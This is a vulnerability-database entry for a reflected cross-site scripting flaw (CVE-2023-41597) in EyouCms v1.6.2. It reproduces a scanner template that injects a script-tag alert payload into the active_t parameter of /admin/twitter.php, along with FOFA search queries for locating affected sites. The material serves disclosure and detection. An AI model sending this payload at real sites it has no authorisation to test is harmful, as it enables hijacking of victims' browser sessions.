CVE-2023-41597: EyouCms v1.6.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: EyouCms v1.6.2 | POC: 已公开

漏洞描述

EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.

PoC代码[已公开]

id: CVE-2023-41597

info:
  name: EyouCms v1.6.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.
  impact: |
    Allows attackers to execute malicious scripts in the context of a victim's browser session.
  remediation: |
    Implement proper input validation and output encoding to prevent XSS attacks.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-41597
    cwe-id: CWE-79
    epss-score: 0.11489
    epss-percentile: 0.93354
    cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: eyoucms
    product: eyoucms
    fofa-query:
      - icon_hash="-614262549"
      - title="eyoucms"
  tags: cve,cve2023,eyoucms,xss,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - 'eyoucms'
          - 'ey_fleshVerify'
        condition: or
        internal: true
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c6ab3fea5da1962abbaf6077fc37f60890e0d298971a6455b44252bdd03a831b0220166a3a9f8d504af83c8288ebb91a81e9b6569dcda78263194e8545241a5ff94f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐